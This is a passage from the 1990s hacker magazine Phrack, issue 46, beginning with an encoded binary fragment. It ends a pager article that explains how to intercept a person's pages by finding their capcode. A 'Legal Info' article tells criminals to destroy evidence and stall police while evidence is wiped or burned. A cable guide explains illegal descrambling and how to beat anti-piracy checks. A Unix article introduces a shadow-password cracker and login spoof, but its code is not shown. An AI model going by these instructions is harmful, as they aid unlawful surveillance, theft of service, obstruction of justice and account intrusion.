MR__@_\']P?_!_<'XP?W#^,'YP?S"^,3PQ'!@<,1@<&#"<&##<,'XPOG!_?__G M___&__O_P?O!^,/P8,'`0,@`PF#!\&!XP?#!^?__^?_]_\+?PI^/#L("``+%. M`,,"!@(.'@^?PM____3____)_[^?Q0\.PP\.R`8.!LH/PA_!_\'?P[___]S_7 M___,_X^?PX\/CP^/#\,'QP8'PP;%!\0/C\(/C___V____]S_O\'_OY^_P?^/' MP@\&Q`3'``0`!`7"#Y\?PK___]'____A_\']P?O"_\']POE@P?#!X,)@QB#"1 M`,4@8,'AP>#"\#!\,)@\ MP>#(\,'QP_#!\\'YP__!^>W____"_\'^<\/_P?GM_\3XPO!PP?!PP?##<,I@I M<,5@QW#&\,+XP?#!_\'YP?O!_<'YY/___\+_P?1SP__!P'_!_<+_P?G!\'_!D M_`'&_\'XZ__"^<'_P?O!^,'[P?_!^\'XPO!PPD#"8,-``,=`S`##0,'@<,'[< MP?G:____PO_![G_#_XX_Q/_!\'_!_@/&_\'^'_;_PI_"WY\?P@X>#QX?'A\.< MP@8"#L4"Q0#"`@#"`@X?#\*?U?___\+_P,P<9_P>1@?\'^0 M'X3!P#@<9,'GP?_!]\'_G[\?P?\^/\'/G\'_P?Y_CG_$_\'?Q/\`Q?\'P?_!& M[\'_P>?^_Y_"O\_____"_\'OP>&`8'^`<\'(P<'_P?O!_\']Q?\PQ/_!_B'!_\'CK MP?_!X,3_P?G__\S____"_\'OP?B`P>#!_\'0<\'HP#!_L'_P?QSP#!_\'XP?9_P?_!_,+FP?_!^''"X,+P/<'_P?C"_\'\# MPO!_P?_"^,'_P?'!_\'@?\/_P?#!Y___R____\+_P>S!^,+PP?_!^'/!^,'@Z M?\'@PO_!_'-`?F`YP?AGP?!C<<'XP>#!_\'XP?Y_P?_!_,'^P?;!_\'P<<'PQ MP>#!\'`]P?YX?\'_P?S"\#Y_P?C!^<'_P?'!_\'\?\'YPO_!\,'G___+____* MPO_!S''!V,'APO\SP<'8!E_!" M\<'F?\'_P?S!\,'F?X#!Y[S!W\'@(\'(P>9YP=_!_P#!X&'!S&?!^<+_P>/!/ M_\+?P?!X?\'SP>?!S\'_P>?!\G___\;____"_\'.`X_!SG\?$PS!S\'_@'^?F MP?[!_Q_!SP?!^\'&9\'[P<<[G`X?P>?!YG^?P=[!YL'.?X?!YQX?P<8'C\'&Z M.9_!_P+!W@>>'\/_A\'_PI_!PG@?P??!QP_!_P<&'P]____$____PO_!SP_!K MS\'OP?^?/@_!QG_!_V8?PO^.PY_V MG\'O'@_!Q@^/P<=X#\'_#\'L#Y\/P_^'P?_"C\'/'X_!_@8'/P?"#@8_PO^'P<8O'XXGP?_!YP?"CX?!_X]_P<\.=\'.& M?Y_![QX/P<\/C\''?Q_!_Q_!Q@^?#\/_!\'_PH_!SY^/P>(&!R<'P@X''___C MQ/___]3_?\'G?\'_P?<#G`X/P?P?P?_!QA[!\\'N?Y_!YXR.P<<+_R MOXPGG\''P_\0P?^?C\'/EX_!\00#!@,^'@'"X'`\P>9XP__!P&?!_<'GP?S!^,'_<,/_P>^QP>_!- M\<'D(R0#/``GO___Q/___^#_P?G&_\'QP_!\=L'X?,+_P>!WP?QGP?QPP?_!S M\,'_P=C!_\'FP?/!_\'SP>#!_\'$?\'_P>#__\;____H_\'YPOC!_L'_P?QXE MPO_!\,'_P?QWP?YAP?_!\,'_P>!_P?![P?_!\\'PP?/!_'O!_,'@P??__\7_& M___X_\'CP?_!X,'_P?!_P?_!\\'^`\'?`SQ&1___Q?______PO\/P?\/OA\/1 M/___Q/______R/]____$_________\W_________S?_________-________S M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_________-_________\W_________S?______D M___-_________\W_________S?_________-_________\W_________S?__R M_______-_________\W_________S?_________-_________\W_________> MS?_________-_________\W_________S?_________-_________\W_____R M____S?_________-_________\W_________S?_________-_________\W_R M________S?_________-_________\W_________S?_________-________] M_\W_________S?_________-_________\W_________S?_________-____R M_____\W_________S?_________-_________\W_________S?_________-R M_________\W_________S?_"'Y_"W________\C_S`\?G\'_O]/_PI_#_\*_2 MSI_#O\'_QI^_RY^_PI^_G[_!_\6?P[^?O___[/_)!\@/C\*?Q?_(GX^?_X^/' MPY^/G\*/R)_!WY_"W\'_P=___]/_WP3&!@?'!L0$Q08'Q0\'PP8'#P ID= PG1 Processing - Please Wait ACK [p 123 ABC 17; ACK EOT The checksum data came from: STX 000 0010 1 011 0001 2 011 0010 3 001 0011 000 1101 A 100 0001 B 100 0010 C 100 0011 000 1101 ETX 000 0011 ---------------- 1 0111 1011 ---------------- 1 7 ; Get it? Get an ASCII chart and it will all make sense. Note: Everything in the paging blocks, from STX to ETX inclusive are used to generate the checksum. Also, this is binary data, guys...you can't just type at the ID= prompt and expect to have it recognized as IXO. It wants specific BITS. Got it? Just checking... ** PAGER FREQUENCIES - US ** [Frequencies transmitting pager information are extremely easy to identify while scanning. They identify each batch transmission with a two-tone signal, followed by bursts of data. People with scanners may tune into some of the following frequencies to familiarize themselves with this distinct audio.] Voice Pager Ranges: 152.01 - 152.21 453.025 - 453.125 454.025 - 454.65 462.75 - 462.925 Other Paging Ranges: 35.02 - 35.68 43.20 - 43.68 152.51 - 152.84 157.77 - 158.07 158.49 - 158.64 459.025 - 459.625 929.0125 - 931.9875 ** PAGER FREQUENCIES - WORLD ** Austria 162.050 - 162.075 T,N,A Australia 148.100 - 166.540 T,N,A 411.500 - 511.500 T,N,A Canada 929.025 - 931-975 T,N,A 138.025 - 173.975 T,N,A 406.025 - 511.975 T,N,A China 152.000 - 172.575 N,A Denmark 469.750 N,A Finland 450.225 T,N,A 146.275 - 146.325 T,N,A France 466.025 - 466.075 T,N,A Germany 465.970 - 466.075 T,N,A 173.200 T,N,A Hong Kong 172.525 N,A 280.0875 T,N,A Indonesia 151.175 - 153.050 A Ireland 153.000 - 153.825 T,N,A Italy 466.075 T,N,A 161.175 T,N Japan 278.1625 - 283.8875 T,N Korea 146.320 - 173.320 T,N,A Malaysia 152.175 - 172.525 N,A,V 931.9375 N,A Netherlands 156.9865 - 164.350 T,N,A New Zealand 157.925 - 158.050 T,N,A Norway 148.050 - 169.850 T,N,A Singapore 161.450 N,A 931.9375 N,A Sweden 169.8 T,N,A Switzerland 149.5 T,N,A Taiwan 166.775 N,A 280.9375 N,A Thailand 450.525 N,A 172.525 - 173.475 N,A UK 138.150 - 153.275 T,N,A 454.675 - 466.075 T,N,A T = Tone N = Numeric A = Alphanumeric V = Voice ** INTERCEPTION AND THE LAW ** For many years the interception of pages was not considered an invasion of privacy because of the limited information provided by the tone-only pagers in use at the time. In fact, when Congress passed the Electronic Communications Privacy Act in 1986 tone-only pagers were exempt from its provisions. According to the ECPA, monitoring of all other types of paging signals, including voice, is illegal. But, due to this same law, paging transmissions are considered to have a reasonable expectation to privacy, and Law Enforcement officials must obtain a proper court order to intercept them, or have the consent of the subscriber. To intercept pages, many LE-types will obtain beepers programmed with the same capcode as their suspect. To do this, they must contact the paging company and obtain the capcode associated with the person or phone number they are interested in. However, even enlisting the assistance of the paging companies often requires following proper legal procedures (warrants, subpoenas, etc.). More sophisticated pager-interception devices are sold by a variety of companies. SWS Security sells a device called the "Beeper Buster" for about $4000.00. This particular device is scheduled as a Title III device, so any possession of it by someone outside a law enforcement agency is a federal crime. Greyson Electronics sells a package called PageTracker that uses an ICOM R7100 in conjunction with a personal computer to track and decode pager messages. (Greyson also sells a similar package to decode AMPS cellular messages from forward and reverse channels called "CellScope.") For the average hacker-type, the most realistic and affordable option is the Universal M-400 decoder. This box is about 400 bucks and will decode POCSAG at 512 and 1200, as well as GOLAY (although I've never seen a paging service using GOLAY.) It also decodes CTCSS, DCS, DTMF, Baudot, ASCII, SITOR A & B, FEC-A, SWED-ARQ, ACARS, and FAX. It takes audio input from any scanners external speaker jack, and is probably the best decoder available to the Hacker/HAM for the price. Output from the M400 shows the capcode followed by T, N or A (tone, numeric or alpha) ending with the message sent. Universal suggests hooking the input to the decoder directly to the scanner before any de-emphasis circuitry, to obtain the true signal. (Many scanners alter the audio before output for several reasons that aren't really relevant to this article...they just do. :) ) Obviously, even by viewing the pager data as it streams by is of little use to anyone without knowing to whom the pager belongs to. Law Enforcement can get a subpoena and obtain the information easily, but anyone else is stuck trying to social engineer the paging company. One other alternative works quite well when you already know the individuals pager number, and need to obtain the capcode (for whatever reason). Pager companies will buy large blocks in an exchange for their customers. It is extremely easy to discover the paging company from the phone number that corresponds to the target pager either through the RBOC or by paging someone and asking them who their provider is when they return your call. Once the company is known, the frequencies allocated to that company are registered with the FCC and are public information. Many CD-ROMs are available with the entire FCC Master Frequency Database. (Percon sells one for 99 bucks that covers the whole country - 716-386-6015) Libraries and the FCC itself will also have this information available. With the frequency set and a decoder running, send a page that will be incredibly easy to discern from the tidal wave of pages spewing forth on the frequency. (6666666666, THIS IS YOUR TEST PAGE, etc...) It will eventually scroll by, and presto! How many important people love to give you their pager number? ** THE FUTURE ** With the advent of new technologies pagers will become even more present in both our businesses and private lives. Notebook computers and PDAs with PCMCIA slots can make use of the new PCMCIA pager cards. Some of these cards have actual screens that allow for use without the computer, but most require a program to pull message data out. These cards also have somewhat large storage capacity, so the length of messages have the option of being fairly large, should the service provider allow them to be. With the advent of 8-bit alphanumeric services, users with PCMCIA pagers can expect to receive usable computer data such as spreadsheet entries, word processing documents, and of course, GIFs. (Hey, porno entrepreneurs: beeper-porn! Every day, you get a new gif sent to your pagecard! Woo Woo. Sad thing is, it would probably sell.) A branch of Motorola known as EMBARC (Electronic Mail Broadcast to A Roaming Computer) was one of the first to allow for such broadcasts. EMBARC makes use of a proprietary Motorola protocol, rather than POCSAG, so subscribers must make use of either a Motorola NewsStream pager (with nifty serial cable) or a newer PCMCIA pager. Messages are sent to (and received by) the user through the use of special client software. The software dials into the EMBARC message switch accessed through AT&T's ACCUNET packet-switched network. The device itself is used for authentication (most likely its capcode or serial number) and some oddball protocol is spoken to communicate with the switch. Once connected, users have the option of sending a page out, or retrieving pages either too large for the memory of the pager, or from a list of all messages sent in the last 24 hours, in case the subscriber had his pager turned off. Additionally, the devices can be addressed directly via x.400 addresses. (X.400: The CCITT standard that covers email address far too long to be worth sending anyone mail to.) So essentially, any EMBARC customer can be contacted from the Internet. MTEL, the parent company of the huge paging service SkyTel, is implementing what may be the next generation of paging technologies. This service, NWN, being administrated by MTEL subsidiary Destineer, is most often called 2-way paging, but is more accurately Narrowband-PCS. The network allows for the "pager" to be a transceiver. When a page arrives, the device receiving the page will automatically send back an acknowledgment of its completed reception. Devices may also send back some kind of "canned response" the user programs. An example might be: "Thanks, I got it!" or "Why on Earth are you eating up my allocated pages for the month with this crap?" MTEL's service was awarded a Pioneers Preference by the FCC, which gave them access to the narrowband PCS spectrum before the auctions. This is a big deal, and did not go unnoticed by Microsoft. They dumped cash into the network, and said the devices will be supported by Chicago. (Yeah, along with every other device on the planet, right? Plug and Pray!) The network will be layed out almost identically to MTEL's existing paging network, using dedicated lines to connect towers in an area to a central satellite up/downlink. One key difference will be the addition of highly somewhat sensitive receivers on the network, to pick up the ACKs and replies of the customer units, which will probably broadcast at about 2 or 3 watts. The most exciting difference will be the speed at which the network transmits data: 24,000 Kbps. Twenty-four thousand. (I couldn't believe it either. Not only can you get your GIFs sent to your pager, but you get them blinding FAST!) The actual units themselves will most likely look like existing alphanumeric pagers with possibly a few more buttons, and of course, PCMCIA units will be available to integrate with computer applications. Beyond these advancements, other types of services plan on offering paging like features. CDPD, TDMA & CDMA Digital Cellular and ESMR all plan on providing a "pager-like" option for their customers. The mere fact that you can walk into a K-Mart and buy a pager off a rack would indicate to me that pagers are far to ingrained into our society, and represent a wireless technology that doesn't scare or confuse the yokels. Such a technology doesn't ever really go away. ** BIBLIOGRAPHY ** Kneitel, Tom, "The Secret Life of Beepers," _Popular Communications_, p. 8, July, 1994. O'Brien, Michael, "Beep! Beep! Beep!," _Sun Expert_, p. 17, March, 1994. O'Malley, Chris, "Pagers Grow Up," _Mobile Office_, p. 48, August, 1994. ==Phrack Magazine== Volume Five, Issue Forty-Six, File 9 of 28 **************************************************************************** Legal Info by Szechuan Death OK. This document applies only to United States citizens: if you are a citizen of some other fascist country, don't come whining to me when this doesn't work..... :) Make no mistake: I'm not a lawyer. I've merely paid attention and picked up some facts that might be useful to me along the way. There are three subjects that it pays to have a knowledge of handy: prescription drugs, medical procedures, and legal facts. While these may all be boring as hell, they can certainly pull your ass out of the fire in a pinch. Standard disclaimer: I make no claims about this document or facts contained therein. I also make no claims about their legal authenticity: if you want to be 100% sure, there's a library in damn near every town, LOOK IT UP! One more thing: This document is useful for virtually ANYTHING. It's effectiveness stretches far beyond computer hacking (although it's worn a bit thin for serious crimes, as every cretin on Death Row has tried it already.....:) OK. Let's say, just for the sake of argument, that you've decided to take a walk along the wild side and do something illegal. For our purposes, let's say computer hacking (imagine that). There are many things you can do cover your legal ass, should your activities come to the attention of any of our various friendly law-enforcement agencies nationwide. -- Part 1: Police Mentality You must understand the police, if you ever want to be able to thwart them and keep your freedom. Most police, to survive in their jobs, have developed an "Us vs. Them" attitude, which we should tolerate (up to a point). They use this attitude to justify their fascist tactics. "Us" is the police, a brotherhood that keeps the peace, always does right, and never snitches on each other, no matter what the cause. "Them" is the rest of the population. If "They" are not guilty of a specific crime, they must have done something else, and they're doing their damndest to avoid getting caught. In addition, many police have cultivated an attitude similar to that of a 15-year-old high school punk: "I'm bad, I'm bad, I'm SOOOOO bad, I Am Cop, Hear Me ROAR," etc. Unfortunately, these people have weapons and the authority to support that attitude. Therefore, if the police come to your house, be EXTREMELY polite and subservient; now is not the time to start spouting your opinion about the police state in America today. Also, DO NOT RESIST THEM IF THEY ARREST YOU. Besides adding a charge of "Resisting Arrest" and/or "Assaulting an Officer", it can get very dangerous. The police have been trained in a number of suspect-control techniques, most of which involve twisting body parts at unnatural angles. As if this weren't enough, almost all police carry guns. Start fighting and you'll get a couple broken bones, torn ligaments, or worse, a few bullet wounds (possibly fatal). So remember, be very meek. Show them that you are cowed by their force and their blustering presence, and this will save you a black eye or two on the way down to the station (from tripping and falling, of course). -- Part 2: Hacker's Security CARDINAL RULE #1: Get rid of the evidence. No evidence = no case for the prosecutor. The Novice Hacker's Guide from LOD has an excellent way to put this: VIII. Don't be afraid to be paranoid. Remember, you *are* breaking the law. It doesn't hurt to store everything encrypted on your hard disk, or keep your notes buried in the backyard or in the trunk of your car. You may feel a little funny, but you'll feel a lot funnier when you when you meet Bruno, your transvestite cellmate who axed his family to death. Basic hints: Hide all your essential printouts, or burn them if they're trash (remember: police need no warrant to search your trash). Encrypt the files on your hard drive with something nasty, like PGP or RSA. Use a file-wiper, NOT delete, to get rid of them when you're done. And WIPE, don't FORMAT, your floppies and other magnetic media (better still, degauss them). With a little common sense and a bit of effort, a great deal of legal headaches can be avoided. -- Part 3A: Polite Entry Next part. You and your friends are enjoying an evening of trying to polevault the firewall on whitehouse.com, when suddenly you hear a knock at the door. Opening the door, you find a member of the local police force standing outside, asking if he can come in and ask you some questions. Now, here's where you start to piss your pants. If you were smart, you'll have arranged something beforehand where your friends (or, if there ARE no friends present, an automatic script) are getting rid of the evidence as shown in part 2. If you have no handy means of destroying the data (printouts, floppies, tapes, etc.), throw the whole mess into the bathtub, soak it in lighter fluid, and torch it. It's a helluva mess to clean up, but nothing compared to latrine duty at your nearest federal prison. While the evidence is being destroyed, you're stalling the police. Ask to see their search warrant and IDs. Mull over each and every one of them for at least 5 minutes. If they have none, start screaming about your 4th Amendment rights. Most importantly: DON'T INVITE THEM IN. They're like vampires: if you let them in, you're fucked. If they see anything even REMOTELY incriminating, that constitutes probable cause for a search and they'll be swarming all over your house like flies on shit. (And guess what! It's legal, because YOU LET THEM IN!) Now, be aware that this won't stall them forever: they can simply wait outside the house and radio in a request for a search warrant, which will probably be signed by the judge on duty at that time. Remember: "If you're not willing to be searched, you MUST have something to hide!" If there are no friends assisting you, as shown above, USE THIS TIME EFFECTIVELY. When they get the warrant signed, that will be too late, because you'll have erased/shredded/burned/hidden/etc. all the incriminating evidence. -- Part 3B: And Suddenly, The Door Burst In Now, if the police already have a search warrant, they don't need to knock on the door. They can simply kick the door down and waltz in. If you're there at the time, you CAN try and stall them as shown above, by asking to see their search warrant and IDs. This may not work now, because they have you cold, hard, and dead to rights. And, if anything incriminating is in a place where they can find it, you're fucked, because it WILL be used as evidence. But this won't happen to you, because you've already put everything you're not using right at the moment in a safe, HIDDEN, place. Right? This leaves the computer. If you hear them kicking the door in, keep calm, and run a script you've set up beforehand to low- level-format the drive, wipe all hacking files, encrypt the whole thing, etc. If there's any printouts or media hanging out, try and hide them (probably worthless anyway, but worth a try). The name of the game now is to minimize the damage that can be done to you. The less hard evidence linking you to the "crime", the less of a case the prosecutor will have and the better off you'll be. -- Part 4: The Arrest Now is the time to kick all your senses into hyper-record mode. For you to get processed through the system without a hitch, the arrest has to go perfectly, by the numbers. One small slip and you're out through a loophole. Now, the police are aware of this and will be doing their best to see that doesn't happen, but you may get lucky all the same. First of all: According to the Miranda Act, the police are REQUIRED BY LAW to read you your rights and make sure you understand them. Remember EVERY WORD THEY SAY TO YOU. If they don't say it correctly, you may be able to get off on a technicality. CARDINAL RULE #2: You have the right to remain silent. EXERCISE IT. This cannot be stressed enough. If you need a reminder, listen to the first part of the Miranda Warning: "You have the right to remain silent. If you give up that right, ANYTHING YOU SAY CAN AND WILL BE USED AGAINST YOU IN A COURT OF LAW." Nice ring to it, hmm? The only words coming out of your mouth at this point should be "I'd like to speak to my attorney, please" and, if applicable in your area, "I'd like to make a phone call, please" (remember the "please's," see part #1 above) Nothing else. There are tape recorders, video cameras, PLUS the word of a dozen police officers to back it all up. How's that for an array of damning evidence against you? Then, after the ride downtown, you'll be booked and probably asked a few questions. Say nothing. You're probably pissing your pants with fear at this point, and may be tempted to roll over on everyone you ever shook hands with in your whole life, but keep your calm, and KEEP QUIET. Keep asking for your attorney and/or a phone call, no matter WHAT threats/deals/etc. they make to you. Remember, they can't legally interrogate you without your attorney present. You may also be tempted to show your mettle at this point, and give them false information, but remember one thing: If you lie to them, you can be convicted of perjury (a nasty offense itself). The best policy here is NSA: Never Say Anything. Remember, you never have to keep track of what you've said, or have to worry about having it used against you, if you've said NOTHING. -- Part 5: The Trial Here, we'll assume you've been arrested, booked, let out on bail, indicted on X counts of so-and-so, etc. You're now in the system. CARDINAL RULE #3: Get the best criminal defense attorney you can afford, preferably one with some background in the crime you've committed. No, scratch that: make that the best criminal defense attorney, PERIOD. It's a helluva lot better to spend 5 years working at McDonald's 12 hours a day to pay back your legal fee, than it is to spend 5 years in the slammer getting pimped out nightly for a pack of menthols. Also, pay attention during the trial. Remember, the defense attorney is working for YOU: it's YOUR life they're deciding, so give him every bit of information and help you can. You're paying him to sort it out for you, but you should still keep an eye on things: if, in the middle of a trial, something happens (you get a killer idea, or want to jump up and scream "BULLSHIT!"), TELL HIM! It very well might be useful! Also, have him nitpick every single thing for loopholes, technicalities, civil rights violations, etc. It's worth it if it pays off. Another important thing is to look good. Image is everything. Although you might prefer to wear heavily stained rock-band T- shirts, leather jackets, ratty jeans, etc. in real life, that will be EXTREMELY damning in the eyes of the judge/jury. They say that clothes make the man, and in this case it's REALLY true: get a suit, comb/cut your hair, shave, etc. Make yourself look like a "positively respectable darling" in the eyes of the court! It'll pay off for you. (hey, it worked for Eric and Lyle Menendez) -- Part 8: The Prison If you're here, you're totally fucked. Unless, by divine intervention, your conviction is overturned on appeal, you'd better clear up the next 5 years on your calendar. Apparently, you didn't read closely enough, so read this every day during your long stay in prison, and you'll be better equipped next time (assuming there IS a next time..... :) Remember the cardinal rules: 1) Don't leave evidence around to be found. 2) KEEP CALM AND KEEP QUIET. 3) Get the best attorney available. If you remember these, and exercise some common sense and a lot of caution, you should have no problem handling any legal problems that come up. Note: This is intended to be used as a handbook for defense from minor crimes ONLY (hacking, DWI, etc.) If you're a career criminal, or you've murdered or raped somebody, you're scum, and at least have the grace to plead "guilty". Don't waste the tax- payers' time and money with fancy legal footwork. Please feel free to add anything or correct this document. However, if you DO add or correct something, PLEASE make sure it's true, and PLEASE email me the changes so I can include them in the next revision of the document. My address is pstlb@acad3.alaska.edu. Happy hacking to all, and if this helps you avoid getting caught, so much the better. :) ==Phrack Magazine== Volume Five, Issue Forty-Six, File 10 of 28 **************************************************************************** /**************************/ /* A Guide to Porno Boxes */ /* by Carl Corey */ /**************************/ Keeping with tradition, and seeing that this is the first article in Phrack on cable TV descrambling, any illegal box for use in descrambling cable television signals is now known as a PORNO BOX. There are many methods that cable companies use to insure that you get what you pay for - and _only_ what you pay for. Of course, there are always methods to get 'more than you pay for'. This file will discuss the most important aspects of these methods, with pointers to more detailed information, including schematics and resellers of equipment. Part I. How the cable company keeps you from getting signals A brief history ---Older Systems--- Most scrambling methods are, in theory, simple. The original method used to block out signals was the trap method. All traps remove signals that are sent from the CATV head end (the CATV company's station). The first method, which is rarely used anymore was the negative trap. Basically, every point where the line was dropped had these traps, which removed the pay stations from your signal. If you decided to add a pay station, the company would come out and remove the trap. This method was pretty secure - you would provide physical evidence of tampering if you climbed the pole to remove them or alter them (sticking a pin through them seemed to work randomly, but could affect other channels, as it shifts the frequency the trap removes.) This was a very secure system, but did not allow for PPV or other services, and required a lot of physical labor (pole-climbers aren't cheap). The only places this is used anymore is in an old apartment building, as one trip can service several programming changes. Look for a big gray box in the basement with a lot of coax going out. If you are going to give yourself free service, give some random others free service to hide the trail. The next method used was termed a positive trap. With this method, the cable company sends a _very_ strong signal above the real signal. A tuner sees the strong signal, and locks onto the 'garbage' signal. A loud beeping and static lines would show up on the set. For the CATV company to enable a station, they put a 'positive' trap on the line, which (despite the name) removes the garbage signal. Many text files have been around on how to descramble this method (overlooking the obvious, buying a (cheap) notch filter), ranging from making a crude variable trap, to adding wires to the cable signal randomly to remove the signal. This system is hardly used anymore, as you could just put a trap inside your house, which wouldn't be noticed outside the house. ---Current Systems--- The next advent in technology was the box. The discussion of different boxes follows, but there is one rather new technology which should be discussed with the traps. The addressable trap is the CATV's dream. It combines the best features of the negative trap (very difficult to tamper with without leaving evidence) with features of addressable boxes (no lineman needs to go out to add a service, computers can process Pay Per View or other services). Basically, a 'smart trap' sits on the pole and removes signals at will. Many systems require a small amp inside the house, which the cable company uses to make sure that you don't hook up more than one TV. I believe that the new CATV act makes this illegal, and that a customer does not have to pay for any extra sets (which do not need equipment) in the house. Of course, we all know that the cable TV company will do whatever it wants until it is threatened with lawsuits. Cable boxes use many different methods of descrambling. Most are not in use anymore, with a few still around, and a few around the corner in the future. The big thing to remember is sync suppression. This method is how the cable companies make the picture look like a really fucked up, waving Dali painting. Presently the most popular method is the Tri-mode In-band Sync suppression. The sync signal is suppressed by 0, 6, or 10 dB. The sync can be changed randomly once per field, and the information necessary for the box to rebuild a sync signal. This very common system is discussed in Radio-Electronics magazine in the 2/87 issue. There are schematics and much more detailed theory than is provided here. The other common method currently used is SSAVI, which is most common on Zenith boxes. It stands for Sync Suppression And Video Inversion. In addition to sync suppression, it uses video inversion to also 'scramble' the video. There is no sync signal transmitted separately (or reference signal to tell the box how to de-scramble) as the first 26 lines (blank, above the picture) are not de-synched, and can be re-synched with a phased lock loop - giving sync to the whole field. The data on inversion is sent somewhere in the 20 or 21st line, which is outside of the screen. Audio can be scrambled too, but it is actually just moved to a different frequency. Radio Electronics August 92 on has circuits and other info in the Drawing Board column. ---Future Systems- For Pioneer, the future is now. The system the new Pioneers use is patented and Pioneer doesn't want you to know how it works. From the patent, it appears to use combinations of in-band, out-band, and keys (also sending false keys) to scramble and relay info necessary to descramble. These boxes are damn slick. The relevant patents are US #5,113,411 and US #4,149,158 if you care to look. There is not much information to be gained from them. Look for future updates to this article with info on the system if I can find any :) Other systems are the VideoCipher + (used on satellites now - this is scary shit.) It uses DES-encrypted audio. DigiCable and DigiCipher are similar, with Digi encrypting the video with DES also (yikes)... And they all use changing keys and other methods. Oak Sigma converters use similar methods which are available now on cable. (digital encryption of audio, etc...) Part II. How the cable company catches you getting those signals There are many methods the CATV company can use to catch you, or at least keep you from using certain methods. Market Code: Almost _all_ addressable decoders now use a market code. This is part of the serial number (which is used for pay per view addressing) which decodes to a general geographic region. Most boxes contain code which tell it to shut down if it receives a code (which can be going to any box on the cable system) which is from a different market area. So if you buy a converter that is say, market-coded for Los Angeles, you won't be able to use it in New York. Bullets: The bullet is a shut down code like above - it will make your box say 'bAh' and die. The method used most is for the head end to send messages to every box they know of saying 'ignore the next shutdown message' ... and once every (legit) box has this info, it sends the bullet. The only boxes that actually process the bullet are ones which the CATV system doesn't know about. P.S. Don't call the cable company and complain about cable if you are using an illegal converter - and be sure to warn anyone you live with about calling the CATV co. also. Leak Detection: The FCC forces all cable companies to drive around and look for leaks - any poor splice jobs (wiring your house from a neighbors without sealing it up nice) and some descramblers will emit RF. So while the CATV is looking for the leaks, they may catch you. Free T-Shirts: The cable company can, with most boxes, tell the box to display a different signal. So they can tell every box they know of (the legit box pool) to display a commercial on another channel, while the pirate boxes get this real cool ad with an 1800 number for free t-shirts... you call, you get busted. This is mostly done during PPV boxing or other events which are paid for - as the company knows exactly who should get that signal, and can catch even legit boxes which are modified to receive the fight. Your Pals: Programs like "Turn in a cable pirate and get $100" let you know who your friends _really_ are. Part III: How to get away with it. I get a lot of questions about opening a box that you own. This is not a good idea. Most, if not ALL boxes today have a tamper sensor. If you open the box, you break a tab, flip a switch, etc... This disables the box and leaves a nice piece of evidence for the CATV co. to show that you played with it. I also have had questions about the old "unplug the box when it is enabled, then plug it back in later"... The CATV company periodically sends a signal to update all the boxes to where they should be. If you want to do this, you'll need to find out where the CATV sends the address information, and then you need to trap it out of the signal. So as soon as the fraudulent customer (let's call him Chris) sees his box get the signal to receive the PPV porn channel, he installs the trap and now his box will never get any pay per view signals again... but he'll always have whatever he was viewing at the time he put the trap in. Big problem here is that most _newer_ systems also tell the box how long it can descramble that channel - i.e. "Watch SPICE until I tell you not to, or 3 hours have passed"... Where to make/buy/get porno boxes: You can order a box which has been modified not to accept bullets. This method is pretty expensive. You can also get a 'pan' descrambler - it is a separate piece that takes whatever goes in on channel 3 (or 2 or 4) and descrambles it. These boxes can't be killed by the bullets, and work pretty well. There are some pans which are made by the same company as your cable box and are sensitive to bullets, so beware. There are two basic ideas for modifying a box (provided you get detailed instructions on how to get it open, or how to fix it once you open it). You can change the S/N to something which is known as 'universal' or disassemble the code and remove the jump to the shutdown code. The universal codes are rare, and may be extinct. Besides, if the cable company finds out your code, they can nuke it. This happens when someone who makes (err made) 'universal' chips gets busted. The modification of the actual code is the best way to do it, just forcing a positive response to permission checks is the easiest way. A 'cube' is not a NeXT, it's a device which removes the data signal from the cable line, and inserts a 'nice' data signal which tells your box to turn everything on. A 'destructive' cube actually re-programs all the boxes below it to a new serial number and gives that number full privileges, while a 'non-destructive' cube needs to know your boxes serial number, so it can tell your box (without modifications) that it can view everything. You have to get a new IC if you change boxes, but the plus is that you can remove the cube and the box functions as normal. Then again, you have to trust the place you are ordering the cube from to not be working for the cable company, as you have to give them your box serial number - which the CATV cable has in their records. Cubes have been seen for sale in the back of Electronics Now (formerly Radio Electronics). Of course, you could check in the above mentioned articles and build circuitry, it would be a lot cheaper. The only problem is that you have to be good enough not to fuck it up - TV signals are very easy to fuck up. Then there is the HOLY GRAIL. Most scrambling systems mess with the sync pulse. This pulse is followed by the colorburst signal on NTSC video. Basically, the grail finds the colorburst and uses it as a reference signal. In theory, it works wonderfully (but does not fix the video inversion problems found on SSAVI systems). However, with the sync pulse whacked, the colorburst method may give weak color or color shifts. The schematics are in the May 1990 Radio-Electronics. I have also received email from aa570@cleveland.Freenet.Edu about his colorburst kit, which is a modified (supposedly higher quality) version of the R-E schematics. The schematic and parts list is 5 bucks, 16 bucks for a pre-drilled and etched board. A little steep, but not too bad. E-mail the above for more information. Anyway, that's all for now. Remember, information (including XXX movies) wants to be free! Carl Corey / dEs ==Phrack Magazine== Volume Five, Issue Forty-Six, File 11 of 28 **************************************************************************** *********************************** * Unix Hacking Tools of the Trade * * * * By * * * * The Shining/UPi (UK Division) * *********************************** Disclaimer : The following text is for educational purposes only and I strongly suggest that it is not used for malicious purposes....yeah right! Introduction : Ok, I decided to release this phile to help out all you guys who wish to start hacking unix. Although these programs should compile & run on your system if you follow the instructions I have given, knowing a bit of C will come in handy if things go wrong. Other docs I suggest you read are older 'phrack' issues with shooting sharks various articles on unix, and of course, 'Unix from the ground up' by The Prophet. This article includes three programs, a SUNOS Brute force Shadow password file cracker, The Ultimate Login Spoof, and a Unix Account Validator. Shadow Crack ------------ SUNOS Unix brute force shadow password file cracker --------------------------------------------------- Well, a while back, I saw an article in phrack which included a brute force password cracker for unix. This was a nice idea, except that these days more and more systems are moving towards the shadow password scheme. This, for those of you who are new to unix, involves storing the actual encrypted passwords in a different file, usually only accessible to root. A typical entry from a System V R4 password file looks like this :- root:x:0:1:Sys. admin:/:/bin/sh with the actual encrypted password replaced by an 'x' in the /etc/passwd file. The encrypted password is stored in a file(in the case of sysV) called /etc/shadow which has roughly the following format :- root:XyfgFekj95Fpq::::: this includes the login i.d., the encrypted password, and various other fields which hold info on password ageing etc...(no entry in the other fields indicate they are disabled). Now this was fine as long as we stayed away from system V's, but now a whole load of other companies have jumped on the bandwagon from IBM (aix) to Suns SUNOS systems. The system I will be dealing with is SUNOS's shadowed system. Now, like sysV, SUNOS also have a system whereby the actual encrypted passwords are stored in a file usually called /etc/security/passwd.adjunct, and normally this is accessible only by root. This rules out the use of brute force crackers, like the one in phrack quite a while back, and also modern day programs like CRACK. A typical /etc/passwd file entry on shadowed SUNOS systems looks like this :- root:##root:0:1:System 